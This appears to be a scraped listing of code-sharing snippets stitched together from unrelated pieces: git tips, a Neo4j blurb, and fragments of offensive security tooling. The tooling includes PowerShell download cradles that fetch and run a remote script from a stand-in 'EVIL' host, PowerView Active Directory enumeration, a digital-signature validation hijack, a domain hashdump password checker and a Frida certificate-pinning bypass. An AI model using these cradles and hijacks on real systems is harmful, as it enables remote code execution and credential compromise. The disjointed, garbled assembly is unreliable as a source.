The git command-line utility has plenty of inconsistencies http://steveko.wordpress.com/2012/02/24/10-things-i-hate-about-git/
A GUI like http://sourcetreeapp.com is often helpful, but staying on the command line usually quicker. This is a list of the commands I use most frequently, listed by functional category:
git status list which (unstaged) files have changed
Graph databases are now one of the core technologies of companies dealing with highly connected data.
Business graphs, social graphs, knowledge graphs, interest graphs and media graphs are frequently in the (technology) news. And for a reason. The graph model represents a very flexible way of handling relationships in your data. And graph databases provide fast and efficient storage, retrieval and querying for it.
Neo4j, the most popular graph database, has proven that ability to deal with massive amount of high connected data in many use-cases.
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
| # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
| # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server |
| <# | |
| DigitalSignatureHijack v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Validate Digital Signature for PowerShell Scripts | |
| function ValidateSignaturePS | |
| { | |
| $ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
| #!/usr/bin/env python3 | |
| #Purpose: To check for and reveal AD user accounts that share passwords using a hashdump from a Domain Controller | |
| #Script requires a command line argument of a file containing usernames/hashes in the format of user:sid:LMHASH:NTLMHASH::: | |
| # ./check_hashes.py <hash_dump> | |
| import argparse | |
| import re | |
| parser = argparse.ArgumentParser(description="Check user hashes against each other to find users that share passwords") |
| // start with: | |
| // frida -U -l pinning.js -f [APP_ID] --no-pause | |
| Java.perform(function () { | |
| console.log('') | |
| console.log('===') | |
| console.log('* Injecting hooks into common certificate pinning methods *') | |
| console.log('===') | |
| var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); |
| javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b) |
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt